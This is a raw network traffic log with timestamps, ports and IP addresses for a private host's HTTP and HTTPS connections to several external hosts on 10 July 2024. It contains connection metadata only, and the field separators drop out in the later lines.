                  Jul 10, 2024 17:36:10.178426981 CEST | 80 | 49728 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.822652102 CEST | 49725 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:10.822694063 CEST | 49724 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:10.822762966 CEST | 49728 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.823669910 CEST | 49729 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:10.823815107 CEST | 49730 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.827120066 CEST | 49731 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:10.830064058 CEST | 80 | 49729 | 89.23.103.42 | 192.168.2.6
                  Jul 10, 2024 17:36:10.830137014 CEST | 49729 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:10.830326080 CEST | 49729 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:10.831959963 CEST | 80 | 49730 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.832015038 CEST | 49730 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.832125902 CEST | 49730 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:10.832304955 CEST | 80 | 49731 | 185.208.158.116 | 192.168.2.6
                  Jul 10, 2024 17:36:10.832353115 CEST | 49731 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:10.832449913 CEST | 49731 | 80 | 192.168.2.6 | 185.208.158.116
                  Jul 10, 2024 17:36:10.835223913 CEST | 80 | 49729 | 89.23.103.42 | 192.168.2.6
                  Jul 10, 2024 17:36:10.837117910 CEST | 80 | 49730 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:10.837618113 CEST | 80 | 49731 | 185.208.158.116 | 192.168.2.6
                  Jul 10, 2024 17:36:11.618807077 CEST | 80 | 49729 | 89.23.103.42 | 192.168.2.6
                  Jul 10, 2024 17:36:11.618864059 CEST | 49729 | 80 | 192.168.2.6 | 89.23.103.42
                  Jul 10, 2024 17:36:11.647613049 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:11.647686958 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:11.647782087 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:11.658533096 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:11.658586025 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.121865988 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.122093916 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.437825918 CEST | 80 | 49730 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:12.437886000 CEST | 49730 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:12.531590939 CEST | 49730 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:12.536865950 CEST | 80 | 49730 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:12.557276964 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.557318926 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.558290005 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.558366060 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.560880899 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.604507923 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669075012 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669112921 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669224977 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669251919 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669251919 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669290066 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669313908 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669334888 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669512987 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669691086 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669722080 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669764996 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.669773102 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.669819117 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.670299053 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.670479059 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.670511007 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.670555115 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.677952051 CEST | 49733 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:12.679316044 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.679383993 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.679439068 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.679490089 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.679533958 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.679580927 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.682739019 CEST | 80 | 49733 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:12.682820082 CEST | 49733 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:12.682913065 CEST | 49733 | 80 | 192.168.2.6 | 185.209.162.226
                  Jul 10, 2024 17:36:12.688194990 CEST | 80 | 49733 | 185.209.162.226 | 192.168.2.6
                  Jul 10, 2024 17:36:12.755783081 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.755847931 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.755871058 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.755882025 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.755897999 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.755943060 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.755965948 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.756007910 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.756043911 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.756081104 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.756212950 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.756261110 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.756268024 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.756315947 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.756894112 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.756948948 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.756968021 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757016897 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757024050 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757070065 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757405043 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757455111 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757499933 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757545948 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757551908 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757596970 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757683039 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757730007 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.757739067 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.757791042 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.758399010 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.758445978 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.758452892 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.758498907 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.758583069 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.758629084 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.758635998 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.758681059 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.759183884 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.759226084 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.759249926 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.759294033 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.759299994 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.759342909 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.759454012 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.759500027 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.760040998 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.760087967 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.842961073 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843039036 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.843075991 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843126059 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.843168020 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843219995 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.843264103 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843321085 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.843358994 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843413115 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.843542099 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.843645096 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.844062090 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.844135046 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.844266891 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.844316959 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.844364882 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.844424009 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.844918013 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.844988108 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.845208883 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.845268011 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.845468044 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.845530987 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.845901966 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.846064091 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.846096039 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.846111059 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.846131086 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.846190929 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.846780062 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.846832991 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.847023010 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.847074032 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.847275972 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.847325087 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.847873926 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.847928047 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.848042011 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.848093033 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.930109978 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930185080 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930391073 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.930422068 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930666924 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.930671930 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930718899 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930749893 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.930775881 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.930830956 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.930890083 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.931067944 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.931128979 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.931159019 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.931210995 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.931674004 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.931740046 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.931766033 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.931822062 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.932224035 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.932295084 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.932385921 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.932447910 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.932511091 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.932566881 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.932600021 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.932657957 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.933254004 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.933325052 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.934509039 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.934581041 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.934708118 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.934766054 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.934815884 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.934875011 CEST | 49732 | 443 | 192.168.2.6 | 188.114.96.3
                  Jul 10, 2024 17:36:12.935075045 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.6
                  Jul 10, 2024 17:36:12.935137987 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935163975 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935224056 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935700893 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935765028 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935801983 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935861111 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.935893059 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.935951948 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936566114 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936625004 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936655045 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936712980 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936747074 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936800003 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:12.936830044 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:12.936887980 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.016710043 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.016797066 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.016828060 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.016882896 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017436028 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017489910 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017513990 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017522097 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.017546892 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.017560005 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018559933 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018615007 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018639088 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018646002 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.018671989 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.018692970 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019042015 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019098043 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019119978 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019125938 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.019153118 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.019169092 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020061016 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020107985 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020128012 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020134926 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.020163059 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.020179987 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021074057 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021123886 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021147966 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021153927 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.021182060 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.021199942 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022053957 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022104025 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022125006 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022130966 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.022156954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.022176027 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023041010 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023088932 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023106098 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023113966 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.023144960 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.023154020 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.103799105 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.103869915 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104038954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104038954 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104073048 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104120970 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104557037 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104612112 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104633093 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104640961 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.104671955 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.104684114 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105652094 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105695963 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105720997 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105727911 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.105751991 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.105772018 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106654882 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106698990 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106723070 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106729031 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.106760025 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.106771946 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107588053 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107631922 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107656002 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107661963 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.107686043 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.107702971 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108325958 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108376026 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108402014 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108407974 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108428001 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108454943 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108460903 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108509064 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108562946 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108566999 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.108589888 CEST44349732188.114.96.3192.168.2.6
                  Jul 10, 2024 17:36:13.108613968 CEST49732443192.168.2.6188.114.96.3
                  Jul 10, 2024 17:36:13.143362045 CEST4972980192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.143625021 CEST4973480192.168.2.689.23.103.42
                  Jul 10, 2024 17:36:13.149002075 CEST804973489.23.103.42192.168.2.6
                  Jul 10, 2024 17:36:13.149071932 CEST4973480192.168.2.689.23.103.42
